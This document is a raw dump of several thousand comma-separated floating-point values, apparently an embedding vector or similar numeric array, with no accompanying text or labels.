-0.00790399219840765, -0.02655801735818386, 0.018872952088713646, -0.0037878016009926796, -0.04115813225507736, -0.03312580659985542, 0.00027271415456198156, -0.016260934993624687, -0.006526266690343618, -0.0015853280201554298, 0.012810959480702877, 0.0014088659081608057, -0.017725476995110512, -0.03173675760626793, 0.024293264374136925, -0.022013410925865173, 0.03028731420636177, -0.012003197334706783, -0.00976863969117403, 0.0010984058026224375, -0.030242018401622772, -0.017634887248277664, 0.001924097421579063, -0.010327279567718506, -0.04269816726446152, -0.004250188823789358, 0.003914250060915947, 0.002177938586100936, 0.011822016909718513, -0.012108885683119297, -0.010176295414566994, -0.018269017338752747, -0.007537857163697481, -0.0040463609620928764, -0.03955770656466484, 0.011648385785520077, 0.007258537225425243, 0.08751010149717331, 0.01656290329992771, -0.014992672950029373, 0.014698254875838757, -0.04016164317727089, 0.008432434871792793, -0.015143657103180885, -0.01073493529111147, 0.0263617392629385, 0.008477729745209217, 0.025455838069319725, -0.009927173145115376, -0.01253918930888176, -0.004567254334688187, 0.0008799514034762979, -0.00991207454353571, 0.016985656693577766, -0.002838491927832365, 0.005341045558452606, -0.009481770917773247, 0.017785869538784027, 0.016744082793593407, 0.002002420136705041, -0.02214929647743702, 0.026105066761374474, -0.02082064002752304, -0.041188329458236694, -0.001253164024092257, 0.015596607699990273, -0.005590168293565512, -0.02888316661119461, 0.007798303849995136, -0.007481238339096308, -0.0015296527417376637, 0.0033782583195716143, 0.03330698609352112, 0.00744349230080843, 0.01418491080403328, 0.022843820974230766, 0.0030800658278167248, 0.0027988587971776724, -0.03831964358687401, 0.0315253809094429, 0.00952706579118967, -0.029622985050082207, -0.031314000487327576, 0.015015320852398872, 0.0019269284093752503, 0.00019910965056624264, -0.019205115735530853, -0.014652960002422333, -0.006277143955230713, 0.00952706579118967, 0.035148985683918, -0.021847330033779144, 0.012305164709687233, -0.02146987058222294, -0.003721746150404215, 0.002630889415740967, -0.01849549263715744, 0.002730916254222393, -0.0038765042554587126, 0.01737821474671364, 0.037534527480602264, 0.005680758506059647, -0.016834672540426254, -0.02387050911784172, 0.010629246942698956, -0.009617656469345093, -0.0035216929391026497, -0.008794795721769333, -0.0061223856173455715, 0.009111861698329449, -0.0140414759516716, 0.0040161642245948315, 0.010719836689531803, -0.027071362361311913, 0.010908566415309906, -0.02663351036608219, -0.0000027609064545686124, 0.020669657737016678, 0.028943559154868126, -0.004231316037476063, -0.004099205136299133, 0.007103779353201389, -0.004884319845587015, 0.009602557867765427, -0.005877037066966295, 0.010055508464574814, -0.02270793542265892, 0.0015032306546345353, 0.0016561015509068966, -0.0043747504241764545, 0.021771837025880814, 0.0058317421935498714, -0.01498512364923954, 0.0008662685286253691, 0.00824370514601469, 0.004004840273410082, -0.02239087037742138, 0.00603934470564127, 0.015113459900021553, 0.038017675280570984, 0.007126426789909601, 0.006382832303643227, 0.010901017114520073, -0.001168235787190497, 0.010417869314551353, 0.010387673042714596, 0.004808828234672546, -0.017121542245149612, -0.0017287624068558216, 0.004846574272960424, -0.01801234483718872, -0.006077090743929148, -0.022692836821079254, 0.012320263311266899, 0.01510591059923172, 0.011618189513683319, -0.013294107280671597, -0.03312580659985542, -0.01480394322425127, 0.03590390458703041, -0.004869221709668636, -0.0051070209592580795, 0.01199564803391695, 0.010342378169298172, -0.018389804288744926, 0.025304853916168213, 0.045234691351652145, 0.025697411969304085, 0.004227541387081146, -0.00439362321048975, 0.00884763989597559, 0.03439406678080559, -0.008704205974936485, 0.012810959480702877, 0.0034424264449626207, 0.02021670714020729, -0.017348017543554306, 0.009640304371714592, 0.016276033595204353, 0.0007341578602790833, 0.008409787900745869, 0.016940362751483917, 0.008153115399181843, -0.00850792694836855, 0.015581509098410606, 0.03137439489364624, -0.0036519162822514772, 0.008153115399181843, 0.004257738124579191, 0.04300013557076454, 0.02125849388539791, 0.0016013699350878596, -0.009995114989578724, 0.02210400067269802, -0.03128380700945854, -0.01781606674194336, 0.021409476175904274, 0.012569386512041092, 0.017348017543554306, 0.047529641538858414, 0.0013324304018169641, -0.0020609262865036726, -0.001040843315422535, -0.014788845553994179, -0.036205872893333435, -0.012863804586231709, -0.01808783784508705, 0.020005328580737114, 0.025652116164565086, -0.030030641704797745, 0.002391203073784709, 0.01597406715154648, 0.022254984825849533, -0.026029575616121292, -0.00954971369355917, 0.0007681291317567229, 0.01512855850160122, -0.016985656693577766, -0.0009898863499984145, -0.0082059595733881, -0.012403303757309914, 0.0008417336503043771, -0.023221280425786972, 0.02014121413230896, 0.03641724959015846, -0.03173675760626793, 0.019763754680752754, 0.0029630535282194614, 0.025380346924066544, -0.010561304166913033, -0.010780230164527893, -0.012531640008091927, -0.018102936446666718, 0.016879968345165253, -0.008153115399181843, 0.008477729745209217, -0.01540787797421217, -0.006058217491954565, 0.009421377442777157, -0.0039482214488089085, -0.008613615296781063, 0.02624095231294632, -0.00912695936858654, 0.02612016536295414, 0.018223723396658897, 0.005609041545540094, 0.010916115716099739, -0.007941738702356815, 0.00008823104872135445, -0.006348860915750265, 0.02836982160806656, 0.01269772183150053, 0.011731427162885666, 0.017438607290387154, -0.026059772819280624, -0.0018061415757983923, 0.017982149496674538, -0.008560771122574806, -0.0025440738536417484, 0.006145033054053783, 0.007016963791102171, -0.016079755499958992, 0.0046880412846803665, 0.025380346924066544, -0.020292198285460472, -0.014720902778208256, -0.0006624406087212265, -0.007115102838724852, 0.01400373037904501, 0.015747591853141785, 0.006194103043526411, -0.027690395712852478, -0.010040410794317722, 0.015898574143648148, -0.004646520595997572, 0.02888316661119461, -0.020563969388604164, -0.0037274081259965897, 0.00497491005808115, 0.017831165343523026, 0.00319519080221653, 0.0005190061638131738, -0.00023260913440026343, 0.0014390626456588507, 0.0017089458415284753, -0.019235312938690186, 0.021968116983771324, -0.0024421599227935076, -0.004438918549567461, -0.009451574645936489, 0.023372264578938484, -0.007522758562117815, 0.0328238382935524, 0.021484969183802605, 0.0023949777241796255, -0.0003760435793083161, -0.014962476678192616, 0.013928238302469254, -0.023493051528930664, 0.0009120354079641402, -0.0022005862556397915, -0.007511435076594353, 0.03064967505633831, -0.010440517216920853, 0.015838181599974632, -0.02002042718231678, -0.002700719516724348, -0.01829921454191208, 0.028943559154868126, -0.0046502952463924885, 0.012335361912846565, -0.01801234483718872, -0.01241840235888958, 0.018555887043476105, -0.020911231637001038, -0.0021534038241952658, 0.0009493094985373318, -0.004578578285872936, 0.04514409974217415, 0.005424086470156908, -0.00749256182461977, -0.006126160267740488, 0.004601225722581148, -0.025410542264580727, -0.011218083091080189, 0.015868378803133965, -0.03294462338089943, -0.00021939806174486876, 0.018963541835546494, 0.004427594598382711, -0.01845019869506359, 0.013211066834628582, 0.01648741029202938, -0.015000222250819206, 0.03348816558718681, -0.026331542059779167, -0.016381721943616867, 0.024051690474152565, 0.01187486108392477, 0.01089346781373024, 0.01299968920648098, -0.0217114444822073, -0.0169705580919981, -0.017604690045118332, -0.03696078807115555, 0.023130690678954124, 0.01284115668386221, 0.020609263330698013, -0.023689329624176025, -0.0025006660725921392, -0.010047960095107555, 0.0009936608839780092, 0.026542920619249344, 0.003765153931453824, 0.013075181283056736, -0.021152805536985397, -0.017876461148262024, -0.004525734111666679, 0.005952529143542051, -0.004857897758483887, -0.052572496235370636, -0.012833607383072376, -0.008560771122574806, 0.004446467384696007, 0.010259336791932583, -0.01922021433711052, 0.01135396771132946, 0.005933656357228756, -0.0014296261360868812, -0.0032706826459616423, 0.011338870041072369, 0.006065766792744398, 0.0006605533417314291, -0.004189795348793268, 0.01416226290166378, -0.00836449209600687, -0.029034148901700974, -0.023930903524160385, 0.017740575596690178, -0.006341312080621719, -0.015536214224994183, 0.013558329083025455, 0.0016815800918266177, 0.011973001062870026, 0.015460722148418427, -0.010161197744309902, 0.004801278933882713, -0.013920689933001995, 0.020609263330698013, -0.0063752830028533936, 0.004170922562479973, -0.0199449360370636, 0.015271992422640324, 0.010999156162142754, 0.0065338159911334515, -0.010659443214535713, -0.031102625653147697, -0.02118300087749958, -0.0019514632876962423, -0.0007237776881083846, -0.007156623527407646, -0.0013182756956666708, 0.01201829593628645, -0.02307029627263546, -0.02418757602572441, -0.0006209201528690755, -0.02467072382569313, -0.015037967823445797, -0.0038538568187505007, -0.013596074655652046, 0.012614681385457516, -0.007428394164890051, 0.001089912955649197, 0.03898397088050842, -0.01689506694674492, -0.03261246159672737, 0.041007149964571, 0.0005308017716743052, -0.014116968028247356, 0.007058484014123678, -0.014147165231406689, -0.009632755070924759, 0.022798527032136917, -0.009466673247516155, 0.010395222343504429, -0.00656023807823658, -0.0170158538967371, -0.004518184810876846, 0.012629779987037182, 0.007534082513302565, 0.030906345695257187, -0.01398108247667551, -0.00444269273430109, 0.013950886204838753, -0.01013100054115057, -0.0122976154088974, 0.008356942795217037, 0.009632755070924759, 0.01588347740471363, -0.017317820340394974, 0.01958257518708706, -0.004869221709668636, 0.01486433669924736, -0.017393313348293304, -0.02427816577255726, 0.010878369212150574, -0.022934410721063614, 0.020277099683880806, -0.0205035749822855, 0.029577691107988358, 0.007258537225425243, -0.01299968920648098, 0.0019514632876962423, -0.00800213124603033, -0.008923131972551346, -0.015445624478161335, 0.027373330667614937, 0.003081953153014183, 0.007956836372613907, -0.0006454549729824066, -0.0245952308177948, 0.0281282477080822, 0.011467205360531807, 0.03146498650312424, -0.03333718329668045, 0.007651094812899828, 0.04867711663246155, -0.014871886000037193, 0.007405746262520552, 0.014018828980624676, 0.00912695936858654, -0.011308672837913036, -0.021213198080658913, 0.01293929573148489, 0.005514676682651043, 0.00544673390686512, -0.008070074021816254, -0.010500910691916943, 0.00590723380446434, -0.0014494427014142275, 0.012946845032274723, 0.0239912960678339, 0.007062258664518595, 0.0053901150822639465, 0.021318886429071426, 0.01534748449921608, 0.007254762575030327, 0.016064656898379326, -0.011127492412924767, -0.004186020698398352, -0.01213908288627863, 0.007979484274983406, -0.009474221616983414, 0.002855477621778846, -0.006628180854022503, 0.003723633475601673, -0.01207868941128254, 0.005073049571365118, -0.018163328990340233, 0.00921000074595213, 0.006726320367306471, 0.03318619728088379, 0.020171411335468292, -0.015581509098410606, -0.017589591443538666, -0.01905413158237934, -0.022315379232168198, 0.003899151924997568, -0.0023326969239860773, 0.020307296887040138, -0.011784271337091923, -0.007790754549205303, 0.0028818997088819742, 0.004382299259305, -0.0030800658278167248, 0.002228895667940378, 0.010357475839555264, 0.019476886838674545, 0.024383854120969772, 0.012584484182298183, 0.0038953772746026516, 0.005760024767369032, 0.03575292229652405, 0.016215641051530838, 0.017755674198269844, -0.015053066425025463, 0.011927706189453602, -0.014773746952414513, 0.007575603201985359, -0.018102936446666718, 0.005537324119359255, 0.01149740256369114, 0.015475820749998093, 0.000711038475856185, 0.03723255917429924, 0.009119410067796707, -0.007790754549205303, -0.01352058257907629, 0.0037198588252067566, -0.01085572224110365, -0.00900617241859436, 0.01476619765162468, -0.01648741029202938, -0.005378791131079197, 0.012305164709687233, 0.0025138771161437035, -0.0009148663375526667, 0.0022119099739938974, -0.005575070157647133, 0.00474466010928154, 0.02980416640639305, 0.018163328990340233, -0.009323238395154476, 0.005295750219374895, 0.003348061814904213, 0.0003913778346031904, -0.016502508893609047, -0.004529508296400309, 0.015377681702375412, 0.0001308131468249485, -0.01028953306376934, -0.01556641049683094, 0.004352102987468243, -0.011263377964496613, 0.01689506694674492, -0.020307296887040138, 0.009874328970909119, -0.001246558502316475, 0.002053377218544483, -0.0069225989282131195, -0.03735334798693657, -0.013044984079897404, -0.00010627831215970218, 0.009678049944341183, -0.0316159687936306, 0.014977574348449707, 0.000170210434589535, 0.0216661486774683, -0.015030419453978539, 0.01123318076133728, -0.0046578445471823215, -0.003855744143947959, -0.02210400067269802, 0.0039557707495987415, -0.039859674870967865, -0.011542697437107563, -0.0019401394529268146, -0.008138016797602177, -0.011104845441877842, 0.0030253343284130096, -0.019280608743429184, -0.013346951454877853, 0.002947955159470439, -0.009753542020916939, 0.005088147707283497, -0.009504418820142746, 0.009406279772520065, -0.00832674652338028, 0.001228629145771265, 0.01982414908707142, 0.010538656264543533, 0.005190061870962381, 0.01339979562908411, -0.00012609490659087896, 0.014668058604001999, -0.011731427162885666, -0.02370442822575569, -0.01213908288627863, -0.00422376673668623, -0.01424530427902937, 0.007179270964115858, 0.013867844827473164, -0.009942270815372467, -0.01617034524679184, 0.007013189140707254, 0.006111061666160822, 0.004601225722581148, 0.020473377779126167, -0.0013635708019137383, -0.035330165177583694, -0.023175984621047974, 0.0036462543066591024, -0.027539411559700966, -0.01333940215408802, 0.0014249079395085573, -0.03342777118086815, -0.0192957054823637, -0.011429459787905216, 0.0015022869920358062, -0.013739509508013725, -0.001102180453017354, -0.013497935608029366, -0.0010823637712746859, -0.008681558072566986, 0.007296283263713121, 0.007100004702806473, 0.004876771010458469, 0.008236155845224857, -0.005544873420149088, 0.002734690671786666, -0.009142057970166206, -0.01725742779672146, 0.007851148024201393, 0.02415737882256508, 0.002912096446380019, -0.005375016946345568, -0.0013947112020105124, 0.018601180985569954, -0.020201608538627625, -0.00491451658308506, -0.008198410272598267, -0.007247213739901781, 0.008590967394411564, 0.028822772204875946, 0.023523246869444847, 0.00427283626049757, -0.034967806190252304, 0.0053901150822639465, -0.007851148024201393, 0.013852747157216072, 0.033397577702999115, -0.00854567252099514, -0.0013399795861914754, 0.018646476790308952, -0.009881877340376377, -0.0015598494792357087, -0.004231316037476063, -0.013596074655652046, 0.014970025978982449, 0.021635951474308968, 0.00574870128184557, 0.007405746262520552, 0.013830099254846573, -0.015989165753126144, 0.010478262789547443, -0.001138039049692452, -0.011225631460547447, -0.0010134775657206774, -0.015392779372632504, 0.00660930760204792, -0.0010568853467702866, -0.002906434703618288, -0.005190061870962381, -0.014856788329780102, 0.0025214264169335365, -0.01612504944205284, -0.00912695936858654, 0.010870820842683315, 0.016034459695219994, -0.021560460329055786, 0.023342067375779152, -0.015838181599974632, -0.024293264374136925, -0.03016652725636959, -0.006431902293115854, 0.005827967543154955, 0.03786669299006462, 0.008168214000761509, 0.012690173462033272, -0.0010880257468670607, 0.01416226290166378, 0.008983525447547436, 0.0004668696492444724, -0.005133443046361208, 0.001483414089307189, -0.0005864769918844104, 0.019914738833904266, 0.0036462543066591024, 0.015717394649982452, 0.0025384121108800173, 0.005186287220567465, 0.01259958278387785, 0.01861627958714962, -0.020277099683880806, -0.004291709512472153, -0.03318619728088379, -0.008492828346788883, 0.004291709512472153, -0.01207868941128254, 0.009172255173325539, -0.00371608417481184, 0.011067098937928677, -0.009579910896718502, 0.0040841070003807545, -0.0164119191467762, 0.008598516695201397, 0.0001549941225675866, 0.003214063821360469, -0.016517607495188713, -0.0013343177270144224, 0.0010984058026224375, -0.016321329399943352, -0.0310120340436697, -0.004382299259305, 0.006647053640335798, -0.005125893745571375, 0.00005443667032523081, 0.0006784826400689781, -0.007753008510917425, -0.0034763978328555822, 0.0033858076203614473, -0.005473155993968248, 0.010206492617726326, 0.0134601891040802, -0.007386873476207256, -0.002572383265942335, -0.0027516763657331467, 0.024851903319358826, 0.0004991895984858274, 0.020277099683880806, -0.001573060522787273, 0.023251477628946304, -0.0014871886232867837, -0.009798836894333363, -0.012712820433080196, 0.005722279194742441, 0.006386606954038143, -0.016260934993624687, 0.003002686658874154, -0.0049862340092659, -0.019839247688651085, 0.00806252472102642, -0.03194813430309296, -0.004038811661303043, -0.011761623434722424, -0.003244260558858514, 0.00906656589359045, 0.019023936241865158, 0.012342910282313824, 0.013097829185426235, -0.01600426249206066, -0.000025434252165723592, 0.009927173145115376, -0.001241840305738151, 0.000048981208237819374, 0.006265820004045963, 0.022451262921094894, 0.009806386195123196, 0.01041032001376152, -0.004820152185857296, -0.005341045558452606, 0.008296549320220947, -0.0077228122390806675, 0.002355344360694289, 0.003868955187499523, -0.019159821793437004, 0.016819575801491737, 0.0019033371936529875, -0.004378525074571371, 0.002959278877824545, 0.010742484591901302, 0.007349127437919378, -0.005197611171752214, -0.002279852516949177, 0.010727385990321636, 0.01684977114200592, 0.005729828495532274, 0.0164119191467762, 0.0034122297074645758, 0.00991207454353571, 0.0013069519773125648, -0.00555619690567255, 0.006945246364921331, 0.022496558725833893, -0.00964785274118185, -0.003661352675408125, -0.012252320535480976, 0.007979484274983406, 0.008877837099134922, 0.009043918922543526, -0.00826635304838419, 0.01588347740471363, -0.015422976575791836, 0.014169812202453613, -0.02057906612753868, -0.014320796355605125, 0.012327812612056732, 0.008772147819399834, -0.018238820135593414, -0.020367689430713654, -0.0015164416981860995, 0.021877525374293327, -0.025938985869288445, 0.010750033892691135, 0.002174164168536663, 0.027690395712852478, -0.02728273905813694, -0.00814556609839201, 0.0035518896766006947, -0.001211643568240106, -0.00360662117600441, 0.01211643498390913, 0.007239664439111948, 0.010863271541893482, 0.013535681180655956, -0.020035525783896446, 0.002323260297998786, -0.004642746411263943, 0.0065338159911334515, 0.00029677717247977853, 0.004537057597190142, 0.00888538546860218, -0.01656290329992771, -0.009738443419337273, 0.00674141850322485, 0.019325902685523033, 0.001574004185386002, -0.001586271682754159, 0.0002779042115435004, -0.01684977114200592, -0.0034782851580530405, -0.0019203228875994682, 0.003848194843158126, -0.016623295843601227, 0.015747591853141785, 0.005948754493147135, 0.005544873420149088, 0.015596607699990273, -0.011331320740282536, 0.01660819724202156, -0.01217682845890522, -0.006254496518522501, -0.00967050064355135, -0.0024968916550278664, -0.021575558930635452, 0.0026969448663294315, -0.021167902275919914, -0.029713576659560204, 0.003668901976197958, -0.005110795609652996, -0.0158079843968153, -0.006522492039948702, 0.015838181599974632, 0.0015060615260154009, -0.021333985030651093, -0.0030706292018294334, 0.021560460329055786, -0.006564012728631496, -0.008538123220205307, 0.019673164933919907, 0.0021590657997876406, -0.0002585594484116882, 0.0005812869057990611, -0.009715795516967773, -0.006590434815734625, -0.0019307030597701669, -0.011225631460547447, 0.0047861807979643345, -0.006945246364921331, 0.010923665016889572, 0.004461565986275673, 0.010561304166913033, 0.010425418615341187, -0.013158222660422325, -0.014796394854784012, 0.019718460738658905, -0.005661885719746351, 0.022360673174262047, 0.019793951883912086, 0.016215641051530838, 0.00596762727946043, -0.0040841070003807545, 0.006779164541512728, -0.0036273812875151634, -0.024127181619405746, -0.020367689430713654, 0.0054807052947580814, -0.00979128759354353, 0.0193410012871027, 0.030196722596883774, -0.003238598583266139, 0.008070074021816254, -0.0030913895461708307, 0.0005572239169850945, 0.003136684652417898, -0.02275323122739792, 0.004544606897979975, 0.00034702642005868256, 0.016744082793593407, 0.008998623117804527, 0.0029441805090755224, -0.004416270647197962, -0.01107464823871851, 0.0054505085572600365, 0.005454283207654953, 0.004382299259305, -0.014652960002422333, -0.02270793542265892, 0.021243395283818245, 0.007179270964115858, 0.019356099888682365, 0.0038406457751989365, 0.03206891939043999, -0.010666992515325546, -0.020156312733888626, 0.005575070157647133, 0.0016579888761043549, 0.02062436193227768, -0.00468426663428545, -0.005016430746763945, 0.009232647716999054, 0.029638083651661873, 0.007696389686316252, -0.0006322438712231815, -0.0067300945520401, -0.019356099888682365, 0.03454505279660225, -0.0062507218681275845, 0.0008502264972776175, 0.004378525074571371, -0.01689506694674492, 0.019718460738658905, 0.0027875350788235664, -0.01922021433711052, 0.006975443102419376, -0.018102936446666718, 0.00456347968429327, 0.010908566415309906, 0.010825525037944317, 0.007084906101226807, 0.009625205770134926, -0.002336471574380994, -0.000684144499246031, 0.006994315888732672, 0.003699098713696003, 0.0003809977206401527, -0.00830409862101078, -0.023040099069476128, 0.015460722148418427, 0.004525734111666679, 0.017272526398301125, -0.029879657551646233, 0.007620898075401783, -0.00272336695343256, 0.0013003464555367827, -0.018872952088713646, 0.02174164168536663, 0.006707447115331888, -0.0021647275425493717, -0.010168747045099735, -0.007934189401566982, 0.0008667403017170727, -0.01247879583388567, 0.012335361912846565, 0.0016730872448533773, 0.011119943112134933, -0.0011531374184414744, 0.023779919371008873, -0.005288201384246349, -0.00046828511403873563, -0.002062813611701131, -0.01123318076133728, -0.00964785274118185, 0.013860296458005905, -0.005295750219374895, 0.013860296458005905, -0.0036877747625112534, 0.0075189839117228985, -0.012682624161243439, 0.00549580343067646, 0.02454993687570095, -0.01312047615647316, -0.012946845032274723, 0.023477952927350998, -0.004869221709668636, -0.009640304371714592, 0.00415204931050539, 0.010365025140345097, 0.01037257444113493, 0.015015320852398872, -0.00988942664116621, 0.007171721663326025, 0.008530573919415474, -0.004386073909699917, -0.0011399262584745884, 0.0026799591723829508, 0.005065500270575285, -0.006635730154812336, -0.016985656693577766, -0.018480394035577774, -0.014607665129005909, -0.010138549841940403, -0.0013531906297430396, -0.028430214151740074, -0.020911231637001038, -0.002074137330055237, -0.003419779008254409, -0.022677740082144737, -0.03333718329668045, 0.03261246159672737, 0.00590723380446434, 0.013935787603259087, -0.02759980596601963, 0.029909854754805565, 0.002083573956042528, 0.01568719744682312, -0.031917937099933624, -0.0022855144925415516, -0.000787002092693001, -0.026105066761374474, 0.0008238043519668281, 0.015438075177371502, -0.003055530833080411, -0.008794795721769333, 0.0047182380221784115, -0.0004402116173878312, 0.0016627070726826787, 0.006201651878654957, 0.003742506494745612, -0.01829921454191208, -0.026588214561343193, 0.010206492617726326, -0.005439184606075287, -0.020111016929149628, 0.0014749212423339486, 0.014056574553251266, 0.007337803952395916, -0.0022439940366894007, 0.0025761579163372517, -0.010342378169298172, -0.021092411130666733, -0.031102625653147697, -0.008757050149142742, -0.010297082364559174, -0.016744082793593407, 0.010236688889563084, -0.007703938987106085, 0.007568053901195526, 0.003614170243963599, 0.020352590829133987, 0.000572322285734117, -0.00988942664116621, 0.014652960002422333, 0.008817443624138832, 0.01784626394510269, -0.002827168209478259, 0.006579111330211163, -0.005827967543154955, 0.004661619197577238, -0.021167902275919914, -0.0032952174078673124, -0.009753542020916939, -0.004669168498367071, -0.023221280425786972, -0.025984279811382294, -0.0012512766988947988, 0.004257738124579191, -0.002074137330055237, 0.0093911811709404, -0.007873795926570892, -0.03354855999350548, 0.0033197521697729826, 0.009904525242745876, -0.00933078769594431, -0.011263377964496613, -0.0024666949175298214, -0.00784359872341156, -0.02442914992570877, -0.0037387318443506956, -0.01946178823709488, 0.004888094495981932, 0.025184066966176033, 0.0028535902965813875, -0.03732315078377724, -0.016502508893609047, -0.025048181414604187, 0.02210400067269802, 0.00591855775564909, 0.00076246727257967, -0.009881877340376377, -0.013165771029889584, 0.013407344929873943, -0.00970824621617794, 0.015536214224994183, 0.0007619954412803054, 0.029094543308019638, 0.004382299259305, -0.01135396771132946, 0.00970824621617794, 0.03354855999350548, -0.0014098095707595348, -0.0014239642769098282, -0.005005106795579195, 0.005012656096369028, 0.005960078444331884, -0.004159598611295223, -0.0022307829931378365, 0.0020250678062438965, 0.009474221616983414, 0.008039877749979496, -0.01644211634993553, 0.0001494501921115443, 0.014668058604001999, -0.015551312826573849, -0.0008436209755018353, -0.0146454107016325, 0.0032650206703692675, -0.0029139837715774775, -0.011421910487115383, 0.003414117032662034, -0.0064054797403514385, -0.020050624385476112, 0.0017098895041272044, -0.0022175719495862722, 0.006990541238337755, 0.000941288482863456, -0.004076557699590921, 0.017634887248277664, 0.010923665016889572, -0.015324837528169155, -0.009164705872535706, 0.001520216348581016, 0.0018287890125066042, -0.007466139737516642, -0.0042388648726046085, 0.0002545489405747503, -0.007726586423814297, -0.00015711731975898147, -0.030906345695257187, 0.030317509546875954, 0.017589591443538666, 0.0007058483897708356, 0.007420844864100218, -0.04822416603565216, 0.007813402451574802, 0.004159598611295223, -0.03415249288082123, 0.025455838069319725, -0.025893690064549446, -0.013973534107208252, 0.01410186942666769, -0.0035009325947612524, -0.0018552112160250545, -0.004631422460079193, -0.0039029265753924847, -0.016502508893609047, 0.006031795404851437, 0.004521959461271763, -0.011067098937928677, 0.012290066108107567, -0.019748657941818237, -0.006575336679816246, -0.012380656786262989, 0.007428394164890051, -0.0340317077934742, -0.00503530353307724, 0.027071362361311913, -0.028384920209646225, 0.0033140904270112514, 0.008613615296781063, -0.009859230369329453, 0.003021559678018093, -0.005612815730273724, -0.0009219436906278133, -0.010281984694302082, 0.013384697958827019, -0.00027200643671676517, -0.02214929647743702, 0.006043119356036186, -0.017272526398301125, 0.001797648728825152, -0.009353434666991234, 0.007413295563310385, -0.001077645574696362, 0.005544873420149088, -0.010274435393512249, -0.0000168529568327358, 0.008643812499940395, 0.010123451240360737, -0.013097829185426235, 0.01689506694674492, 0.0006563069182448089, 0.02571251057088375, -0.005348594859242439, 0.012108885683119297, 0.0026346640661358833, -0.004933389835059643, -0.005454283207654953, -0.015453172847628593, 0.002855477621778846, -0.016019361093640327, 0.00738309882581234, -0.00668102502822876, 0.0007752064848318696, -0.017785869538784027, -0.018238820135593414, -0.012690173462033272, -0.02033749409019947, 0.007760557811707258, 0.008877837099134922, 0.017348017543554306, 0.029275722801685333, -0.01047071348875761, 0.0006666870322078466, -0.007881345227360725, 0.023976197466254234, -0.00090778898447752, 0.007971934974193573, -0.00514476653188467, 0.0001894372544484213, -0.013626271858811378, -0.010802878066897392, -0.012916648760437965, -0.0029026600532233715, -0.008930681273341179, 0.019084328785538673, -0.01147475466132164, 0.005239131394773722, 0.005054176785051823, -0.01704605109989643, 0.012743017636239529, -0.017906656488776207, 0.009881877340376377, 0.02418757602572441, -0.002221346367150545, 0.0008403182146139443, 0.00967050064355135, -0.021122608333826065, -0.014615214429795742, 0.0015702296514064074, 0.0009228873532265425, -0.008855189196765423, -0.012471246533095837, -0.013528131879866123, 0.01917491853237152, 0.0005331608699634671, 0.021892623975872993, -0.022602247074246407, -0.0027271416038274765, 0.02006572298705578, 0.009625205770134926, 0.009511968120932579, -0.0009327956358902156, -0.004050135612487793, -0.00033688219264149666, 0.008032328449189663, -0.01660819724202156, -0.006964119151234627, -0.02836982160806656, 0.02125849388539791, 0.0027384653221815825, -0.0065111685544252396, 0.02747901901602745, -0.011369066312909126, -0.022979706525802612, 0.002083573956042528, -0.0019222102127969265, 0.01067454181611538, 0.027433723211288452, 0.009579910896718502, -0.010463165119290352, 0.0169705580919981, 0.02217949368059635, -0.009542164392769337, 0.02118300087749958, -0.016457214951515198, -0.0035009325947612524, -0.01805764064192772, 0.010123451240360737, -0.00744349230080843, 0.0081833116710186, 0.0038123363628983498, -0.00328011903911829, 0.00251765176653862, -0.003723633475601673, 0.009474221616983414, -0.0017381989164277911, 0.016879968345165253, 0.012607132084667683, -0.0025214264169335365, -0.009119410067796707, -0.0010502798249945045, -0.0075491806492209435, 0.0033329634461551905, 0.005843066144734621, 0.006526266690343618, 0.004310582298785448, -0.009081664495170116, 0.01985434629023075, -0.011301123537123203, 0.0011729539837688208, -0.0017580154817551374, 0.004910741932690144, -0.001168235787190497, -0.030921444296836853, -0.0058694882318377495, 0.007300057914108038, 0.009655402041971684, 0.0067867133766412735, -0.003929348662495613, -0.015249345451593399, -0.008802345022559166, -0.008228607475757599, 0.00121636176481843, -0.012335361912846565, 0.0006077090511098504, -0.003008348634466529, 0.0019344775937497616, -0.015339935198426247, -0.001440006191842258, 0.0014843576354905963, 0.010984058491885662, -0.0003420722496230155, -0.008855189196765423, 0.01857098564505577, -0.004910741932690144, 0.008319197222590446, 0.006035570055246353, 0.015521115623414516, 0.010885918512940407, 0.007530307862907648, 0.024489542469382286, -0.004797504283487797, -0.0012814734363928437, 0.03750433027744293, 0.03714197129011154, -0.034001510590314865, 0.01001021359115839, -0.030030641704797745, 0.010931214317679405, -0.005982725881040096, 0.012463697232306004, 0.003463186789304018, -0.017468804493546486, -0.00204582791775465, -0.01199564803391695, -0.015309738926589489, 0.00988942664116621, 0.001519272685982287, 0.008590967394411564, -0.0002887561568059027, 0.014237754978239536, 0.03309560939669609, -0.01364136952906847, 0.022194592282176018, -0.002093010349199176, 0.01119543518871069, -0.007217017002403736, -0.001367345335893333, 0.009376082569360733, -0.00660930760204792, -0.021167902275919914, 0.0003958601737394929, -0.009904525242745876, 0.03466583788394928, -0.0048163775354623795, 0.023160886019468307, -0.012471246533095837, -0.016140148043632507, -0.0013881056802347302, -0.0019259847467765212, 0.0043068076483905315, 0.017544295638799667, 0.017604690045118332, 0.0010021537309512496, 0.019567476585507393, 0.008236155845224857, -0.007768107112497091, 0.031072428449988365, 0.01653270609676838, -0.009406279772520065, 0.003261246019974351, 0.0019052245188504457, 0.026256050914525986, 0.025017986074090004, -0.013384697958827019, 0.009798836894333363, 0.012682624161243439, -0.018993739038705826, 0.013354500755667686, 0.0038519694935530424, 0.0073113818652927876, 0.01253918930888176, -0.025531329214572906, 0.01019139401614666, -0.014169812202453613, -0.02021670714020729, 0.009783738292753696, -0.0017750011757016182, -0.023477952927350998, 0.011286024935543537, 0.02820373885333538, 0.002898885402828455, 0.02210400067269802, 0.007088680751621723, -0.015913672745227814, -0.004004840273410082, 0.0181331317871809, -0.04209423065185547, 0.006699897814542055, 0.013007238507270813, -0.010878369212150574, 0.005023980047553778, 0.022798527032136917, 0.012871352955698967, -0.008704205974936485, -0.010183844715356827, -0.003742506494745612, -0.003712309757247567, -0.004431369248777628, -0.0022326703183352947, 0.0007719037239439785, -0.0009276056080125272, 0.023130690678954124, 0.008070074021816254, -0.003672676393762231, 0.009685599245131016, 0.015332385897636414, -0.009157156571745872, 0.0046804919838905334, -0.017604690045118332, 0.0036103958263993263, 0.004118077922612429, -0.019673164933919907, 0.006643278989940882, -0.011218083091080189, -0.014147165231406689, 0.0021986989304423332, -0.00900617241859436, 0.007949287071824074, -0.013248812407255173, -0.006624406203627586, 0.02186242863535881, -0.01247879583388567, -0.012410853058099747, 0.004227541387081146, 0.003523580264300108, 0.0061148363165557384, -0.001846718369051814, 0.02006572298705578, -0.004057684913277626, 0.01784626394510269, 0.013211066834628582, -0.029758870601654053, 0.005544873420149088, 